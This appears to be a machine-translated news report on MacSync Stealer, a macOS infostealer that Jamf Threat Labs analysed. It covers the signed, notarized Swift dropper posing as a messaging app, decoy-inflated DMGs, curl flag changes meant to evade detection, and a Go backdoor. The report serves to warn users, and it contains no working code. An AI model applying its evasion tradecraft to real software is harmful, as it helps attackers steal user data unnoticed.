The ecosystem of Mac computers It faces an increasingly sophisticated threat: MacSync Stealer, an malware Specializing in information theft, this malware has learned to disguise itself as a completely legitimate Apple application. Far from the typical clumsy and obvious viruses, this malicious software installs itself stealthily and exploits the system's own security vulnerabilities. macOS trust mechanisms to go unnoticed.
In its most recent variants, MacSync Stealer has managed Obtain valid digital signatures and official Apple notarizationThis allows it to run without raising suspicion or being blocked by tools like Gatekeeper or XProtect. This evolution complicates early detection and opens the door to leaks of sensitive data on both home computers and in professional environments in Spain and the rest of Europe.
What is MacSync Stealer and why is it a concern in the macOS ecosystem?
MacSync Stealer is a "Information stealer" type Trojan designed for macOS systemsIts main objective is to collect and exfiltrate data from the infected computer. It can access personal information, credentials, browsing history, and other data of value to the attackers, which is then used for fraud, unauthorized access, or sale on black markets.
In his first appearances, this malware It was distributed using tactics such as drag to the Terminal or the ClickFix-type methodswhere the user, deceived, copied and pasted malicious commands. This approach required some manual interaction and therefore offered more opportunities for the victim to become suspicious and abort the installation.
The situation has changed with the latest variant identified by Jamf Threat Labs, a lab specializing in Apple device security. Their analysis reveals that MacSync Stealer has taken a qualitative leap and adopts a much quieter and more automated approachminimizing the need for user intervention and exploiting the trust placed in the Apple brand.
The researchers explain that the malicious installer presents itself as a application in Swift, Apple's programming language, with its corresponding Valid developer ID and code signature, in addition to being notarized by the company itselfIn practice, this means that, for macOS, the software appears to be completely reliable.
A Swift installer that bypasses Gatekeeper and disguises itself as a messaging service
The new MacSync Stealer campaign relies on an installer that masquerades as a messaging app or productivity toola common cover-up that reduces the suspicions of the average user. In one of the cases analyzed, the file was distributed as a DMG disk image called “zk-call-messenger-installer-3.9.2-lts.dmg”, hosted on a specific domain dedicated to this alleged service.
To be digitally signed and notarizedThe installer can run without Gatekeeper blocking it from entering. However, screens with instructions have been observed directing the user to do Right-click and select "Open"This is a classic trick to circumvent additional system warnings when the app's origin raises any doubts. These behaviors are worrying even in the face of... constant improvements to macOS in protection.
The main component acts as a "dropper" written in SwiftThat is, a container whose function is to prepare the ground and unload the actual malicious payload. Before doing so, it performs a series of environmental checks, such as verifying the internet connection and confirming that a minimum execution time is met—around 3600 seconds, according to the analysis— and remove quarantine attributes from the files involved.
Jamf experts highlight specific changes in the way download the payloadThe tool uses the command curl with less common parameter combinations (for example, by separating the typical sequence -fsSL en -fL y -sSand incorporating options such as --noproxy), in addition to dynamic variables. These adjustments point to a deliberate attempt to improve download reliability and evade certain detection patterns used by security solutions.
Inflated DMG images and decoy files to mislead security systems
Another striking feature of this campaign is the use of large disk imagesThe DMG contained in the installer reaches approximately 25,5 MB, an unusually high weight for a relatively simple app. According to analysis by Jamf Threat Labs, that size is achieved inflating the file with PDFs or other irrelevant documents embedded in the package.
This filler has no functional use for the user, but it does complicate the automated analysis by antivirus and inspection toolsBy mixing decoy files with malicious content and increasing the size, the aim is to make it harder to identify suspicious patterns and slow down the review process.
Once the DMG is mounted and the application is running, the drop executes its system pre-controls, including checking network connectivity. If the environment is as expected, it proceeds to connect to a Remote server controlled by the attackers, from which it downloads a Base64 encoded payload which contains the malware's core. Similar cases of threats that have reached Macs help to contextualize this risk, such as the arrival of several Trojans on macOS.
That code, once decoded, corresponds to MacSync, an evolution of a threat known as Mac.c which was first identified in April 2025. Research from teams such as Moonlock Lab (MacPaw) indicates that this family incorporates a full agent written in Go, capable of going far beyond simply stealing passwords.
From "stealer" to backdoor: MacSync capabilities
The core component of MacSync is not limited to extracting information. According to public analyses, the threat integrates advanced command and control (C2) functionsThis allows attackers to maintain a persistent connection to the compromised machine. Threats with similar remote control capabilities have been documented on multiple occasions on macOS systems.
Among the capabilities associated with this type of agent are the following: remote execution of commands, the exfiltration of different types of files, access to browsing data or stored credentials, and potentially the installation of new malicious modules On demand. In other words, the affected equipment can become another link in an infrastructure controlled by cybercriminals.
The transition from a simple stealer to a modular remote control platform This represents a significant increase in risk, both for individuals and businesses. An infected Mac ceases to be merely a source of stolen passwords and becomes an entry point to corporate networks, cloud services, or connected critical systems.
In this context, specialists emphasize that the macOS's appeal to attackers has increasedThe increasing adoption of Mac computers in European offices, government buildings, and homes has broken the old myth that “there are no viruses on Macs”, forcing criminals to develop more sophisticated tools to exploit this user base.
Apple's response and general trend of malware for macOS
After being alerted by security researchers, Apple has revoked the code signing certificates linked to the MacSync Stealer campaign. This measure theoretically prevents the same signed applications from continuing to run unimpeded and blocks new builds associated with that Developer IDApple has already taken similar measures in response to previous threats, as documented when acted against Silver Sparrow.
However, both Jamf Threat Labs and other experts warn that the MacSync Stealer case reflects a broader trend in the macOS malware landscapeMore and more malicious actors are trying to inject their code into signed and notarized executable documentsIt appears to be legitimate software, which significantly reduces the likelihood of the user receiving clear danger alerts. Therefore, it's advisable to supplement defenses with additional tools such as protection solutions for macOS.
This way of operating also relies on the social engineeringThe mere fact that an application passes Apple's initial checks and is presented with the icon of a popular tool or a supposed official service already generates a sense of security that many users do not question, especially in environments where macOS is traditionally perceived as a "secure platform".
Furthermore, it has been observed that similar techniques—such as the use of DMG-branded companies that mimic Google Meet— have been applied to distribute others stealers for macOS, such as Odyssey. At the same time, some groups continue to use unsigned disk images for campaigns with threats like DigitStealer, demonstrating the coexistence of classic methods and more refined strategies within the same criminal ecosystem.
For users and businesses in Spain and Europe, this scenario implies that the Blind trust in Apple's validation mechanisms is no longer enough.Although certificate revocation and constant macOS improvements are important steps, the speed at which new variants emerge necessitates continuous vigilance.
Everything that happened with MacSync Stealer makes it clear that Mac malware is no longer anecdotal and has become a serious problem: attackers exploit the very vulnerabilities of Macs. Apple trust structuresThey camouflage their code in signed and notarized applications, use disk images inflated with decoy files, and deploy advanced agents with data theft and remote control capabilities—a cocktail that makes it necessary to take macOS security very seriously, both at home and in the professional sphere.
